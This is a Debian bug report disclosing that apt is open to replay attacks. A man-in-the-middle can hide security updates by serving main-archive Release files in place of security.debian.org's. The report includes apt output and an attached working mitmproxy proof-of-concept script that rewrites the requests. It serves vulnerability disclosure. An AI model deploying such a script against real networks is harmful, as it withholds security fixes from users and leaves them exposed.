Bug#863317: apt: susceptible to replay attacks

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#863317: apt: susceptible to replay attacks
From: Jakub Wilk <jwilk@jwilk.net>
Date: Thu, 25 May 2017 13:30:13 +0200
Message-id: <[🔎] 20170525113013.rr67ogj542d4dxpy@jwilk.net>
Reply-to: Jakub Wilk <jwilk@jwilk.net>, 863317@bugs.debian.org

Package: apt
Version: 1.0.9.8.4
Tags: security

Nearly a decade ago, Valid-Until fields were added to Release files (bug#499897). The primary motivation for this was to protect from aman-in-the-middle adversary from serving an outdated copy of the securitymirror.

Unfortunately, this protection is ineffective. All the attacker needs to do tohide security updates is to replace all the files fromhttp://security.debian.org/dists/$DIST/updates/ with the ones fromhttp://deb.debian.org/debian/dists/$DIST/ .


I've attached a proof-of-concept mitmproxy script that implements this attack:

   # apt-cache policy bitlbee
   bitlbee:
     Installed: (none)
     Candidate: 3.2.2-2+deb8u1
     Version table:
        3.2.2-2+deb8u1 0
           500 http://security.debian.org/ jessie/updates/main i386 Packages
        3.2.2-2 0
           500 http://http.us.debian.org/debian/ jessie/main i386 Packages

   # apt-get update -o Acquire::http::Proxy=http://127.0.0.1:8080
   Ign http://http.us.debian.org jessie InRelease
   Hit http://http.us.debian.org jessie-updates InRelease
   Hit http://http.us.debian.org jessie Release.gpg
   Ign http://security.debian.org jessie/updates InRelease
   Get:1 http://http.us.debian.org jessie-updates/main i386 Packages/DiffIndex [7900 B]
   Get:2 http://security.debian.org jessie/updates Release.gpg [2373 B]
   Hit http://http.us.debian.org jessie Release
   Hit http://http.us.debian.org jessie/main i386 Packages
   Get:3 http://security.debian.org jessie/updates Release [148 kB]
   Get:4 http://security.debian.org jessie/updates/main i386 Packages [6793 kB]
   Fetched 6952 kB in 7s (978 kB/s)
   Reading package lists... Done

   # apt-cache policy bitlbee
   bitlbee:
     Installed: (none)
     Candidate: 3.2.2-2
     Version table:
        3.2.2-2 0
           500 http://http.us.debian.org/debian/ jessie/main i386 Packages
           500 http://security.debian.org/ jessie/updates/main i386 Packages


-- System Information:
Debian Release: 8.8
 APT prefers stable-updates
 APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages apt depends on:
ii  debian-archive-keyring  2014.3
ii  gnupg                   1.4.18-7+deb8u3
ii  libapt-pkg4.12          1.0.9.8.4
ii  libc6                   2.19-18+deb8u9
ii  libgcc1                 1:4.9.2-10
ii  libstdc++6              4.9.2-10

--
Jakub Wilk

# Usage: mitmproxy [options] -s no-security.d.o.py

try:
    import mitmproxy
except ImportError:  # mitmproxy < 0.18
    def request(ctx, flow):
        return _request(flow)
else:  # mitmproxy >= 0.18
    def request(flow):
        return _request(flow)

def _request(flow):
    if flow.request.host == 'security.debian.org' and flow.request.port == 80:
        flow.request.anticache()
        flow.request.path = '/debian' + flow.request.path.replace('/updates/', '/')
        flow.request.host = 'deb.debian.org'
        flow.request.headers['Host'] = ['deb.debian.org']
        flow.scheme = 'http'

# vim:ts=4 sts=4 sw=4 et

Reply to:

Follow-Ups:
- Bug#863317: apt: susceptible to replay attacks
  - From: Julian Andres Klode <jak@debian.org>

Prev by Date: Bug#863179: apt: GPG errors on update and other operations
Next by Date: Processed: found 863317 in 1.0.9.8
Previous by thread: ERP Software users list
Next by thread: Bug#863317: apt: susceptible to replay attacks
Index(es):
- Date
- Thread